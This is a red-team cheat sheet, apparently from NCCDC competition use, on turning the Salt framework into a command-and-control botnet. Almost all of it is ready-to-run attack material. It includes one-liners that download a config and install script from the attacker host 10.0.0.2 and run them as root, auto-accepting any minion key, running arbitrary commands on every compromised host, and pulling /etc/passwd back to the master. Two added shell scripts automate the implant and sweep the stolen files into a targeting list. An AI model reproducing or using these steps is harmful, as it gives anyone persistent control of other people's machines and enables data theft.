Salt Command and Control Cheat Sheet
Recently, as an experiment, I used the Salt framework as a malicious command and control (C&C or C2) infrastructure at NCCDC. It was really successful, and made for a highly reliable and manageable remote access trojan. There is a ton of great documentation already out there on Salt, but I wanted to take a minute to jot down some of my notes for future C2 excellence.
I had most of my stuff staged on a local network, so that it would be easy to install and call back to the master without having to traverse the Internet. I also had my master set up to auto-accept all keys (auto_accept: True in the master config), so I could receive callbacks and execute commands quickly without having to bother with accepting keys by hand (salt-key -L / salt-key -A). Keep in mind that this lets any host that can reach the master enrol itself as a minion, so only do it on a network you control. As each box would connect back, I would try to give it a unique name based on hostname and when it was connecting back. Once on a box, I would attempt to install my minions as quickly as possible, typically with one of the following one-liners ready to go (broken out here). After that, you're off to the races with your botnet army!
Minion Installers
On Windows:
PS C:\ > $name = "win_"+$(hostname)+"_"+$(Get-Date -Format s)
PS C:\ > Salt-Minion-x64.exe /S /master=10.0.0.2 /minion-name=$name /start-service=1
On Linux w/ apt-get (these need root; the package starts salt-minion with the default config, so restart it after dropping in ours):
$ sudo apt-get install -y salt-minion salt-common
$ wget http://10.0.0.2/minion
$ sudo mv ./minion /etc/salt/minion
$ sudo service salt-minion restart
Or install from a script:
$ wget http://10.0.0.2/saltmin.sh
$ chmod +x saltmin.sh
$ NOW=$(date +"%m-%d-%YT%H:%M:%S")
$ sudo ./saltmin.sh -P -I -i "linux_$(hostname)_$NOW" -A 10.0.0.2
(%H rather than %k keeps the hour zero-padded, so the minion id contains no spaces. If saltmin.sh is a copy of Salt's bootstrap-salt.sh, the flags are: -P allow pip installs, -I allow insecure downloads, -i minion id, -A master address.)
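The Linux install above as a reusable script, together with the master-side settings the setup relies on (auto-accepting keys, receiving pushed files). This is an added example, not code from the original post: it assumes the master is 10.0.0.2 (override with MASTER_ADDR), that the minion is installed with apt-get, and the drop-in file names under /etc/salt/minion.d/ and /etc/salt/master.d/ are our own choice.

```sh
#!/bin/sh
# Added example, not from the original post: the Linux install as a reusable
# script plus the master-side settings it depends on. Assumptions: master is
# 10.0.0.2 (override with MASTER_ADDR), salt-minion comes from apt-get, and the
# drop-in file names under /etc/salt/*.d/ are our choice.
set -u

MASTER_ADDR="${MASTER_ADDR:-10.0.0.2}"

# Build an id like "linux_web01_2020-03-01T09:05:03": prefix, hostname
# (uname -n, same value as hostname), timestamp. %H keeps a zero-padded hour;
# date's %k would put a space in the id.
gen_minion_id() {
    printf '%s_%s_%s\n' "$1" "$(uname -n)" "$(date +%Y-%m-%dT%H:%M:%S)"
}

# The minion config the post serves as http://10.0.0.2/minion: which master
# to call back to and what this box calls itself.
render_minion_config() {
    printf 'master: %s\nid: %s\n' "$1" "$2"
}

# Master-side settings (drop into /etc/salt/master.d/): auto_accept lets any
# host that reaches the master enrol without salt-key -A; file_recv must be
# on before cp.push can upload files from minions.
render_master_config() {
    printf 'auto_accept: True\nfile_recv: True\n'
}

# Install and enrol this box. Needs root. restart (not start) so the minion the
# package already launched re-reads its config instead of looking for "salt".
install_minion() {
    id="$(gen_minion_id linux)"
    apt-get install -y salt-minion salt-common
    mkdir -p /etc/salt/minion.d
    render_minion_config "$MASTER_ADDR" "$id" > /etc/salt/minion.d/c2.conf
    service salt-minion restart
    echo "$id"
}

# Only touch the system when explicitly asked: SALT_C2_INSTALL=1 sh ./install.sh
if [ "${SALT_C2_INSTALL:-0}" = "1" ]; then
    install_minion
fi
```

Run it with SALT_C2_INSTALL=1 as root on the target; without that variable it only defines the helpers, so you can source it and call render_master_config on the master side to produce the drop-in there.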
Command Execution
Show which minions are up:
salt-run manage.up
Show minions that are down:
salt-run manage.down
Show all minions status:
salt-run manage.status
Test all minions connectivity:
salt '*' test.ping
Check if a process is running on all minions:
salt '*' ps.grep apache
Check if a file on all minions contains a string:
salt "*" file.contains /etc/passwd "admin"
Pull a file from a subgroup of minions (the master needs file_recv: True; each copy lands under /var/cache/salt/master/minions/<minion_id>/files/):
salt "linux*" cp.push /etc/passwd
Send a file from the master to a subgroup of minions:
salt-cp "linux*" script_to_copy.py /target-dir/copy_of_script.py
Run arbitrary commands on a subgroup of minions:
salt "linux*" cmd.run "ls -lah /home/"
Get networking info from all minions:
salt '*' network.ip_addrs
More available network modules:
network.ping, network.traceroute, network.get_hostname, network.mod_hostname
Get uptime of all minions:
salt '*' status.uptime
Reboot all minions:
salt '*' system.reboot
Service status (service.status takes the service name; without it the call fails):
salt '*' service.status httpd
salt '*' service.start httpd
salt '*' service.stop httpd
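Following up the cp.push command above: once the minions have uploaded /etc/passwd, the copies sit on the master under the cachedir at minions/<minion_id>/files/<remote path>, and the useful next step is to sweep them all for something. This is an added example, not code from the original post; it assumes the default cachedir /var/cache/salt/master (override with SALT_CACHEDIR), and the minion ids and passwd contents in the demo are constructed.

```sh
#!/bin/sh
# Added example, not from the original post. After `salt "linux*" cp.push
# /etc/passwd`, each minion's copy lands on the master at
# <cachedir>/minions/<minion_id>/files/<remote path>. These helpers locate those
# copies and sweep them for a pattern. Assumes the default cachedir (override
# with SALT_CACHEDIR); the demo's minion ids and file contents are constructed.
set -u

SALT_CACHEDIR="${SALT_CACHEDIR:-/var/cache/salt/master}"

# Where the master stores a file pushed from one minion: $1 = minion id,
# $2 = absolute path the file had on the minion.
pushed_file_path() {
    printf '%s/minions/%s/files%s\n' "$SALT_CACHEDIR" "$1" "$2"
}

# Print "<minion_id>:<line>" for every pushed copy of $1 whose lines match $2.
# Minions that never pushed the file are skipped silently.
sweep_pushed_files() {
    remote_path="$1"; pattern="$2"
    for dir in "$SALT_CACHEDIR"/minions/*/; do
        [ -d "$dir" ] || continue
        minion_id="$(basename "$dir")"
        f="$(pushed_file_path "$minion_id" "$remote_path")"
        [ -f "$f" ] || continue
        grep -- "$pattern" "$f" | sed "s/^/$minion_id:/"
    done
}

# Constructed demo: two minions' /etc/passwd copies in a scratch cachedir,
# then a sweep for an account named admin (only linux_web01 has one).
demo_sweep() {
    tmp="$(mktemp -d)"
    mkdir -p "$tmp/minions/linux_web01/files/etc" "$tmp/minions/linux_db01/files/etc"
    printf 'root:x:0:0:root:/root:/bin/bash\nadmin:x:1001:1001::/home/admin:/bin/bash\n' \
        > "$tmp/minions/linux_web01/files/etc/passwd"
    printf 'root:x:0:0:root:/root:/bin/bash\n' \
        > "$tmp/minions/linux_db01/files/etc/passwd"
    ( SALT_CACHEDIR="$tmp"; sweep_pushed_files /etc/passwd '^admin:' )
    rm -rf "$tmp"
}
```

On a live master, `sweep_pushed_files /etc/passwd '^admin:'` after the cp.push gives one line per minion that has such an account, prefixed with the minion id, so it doubles as a targeting list for the next salt command.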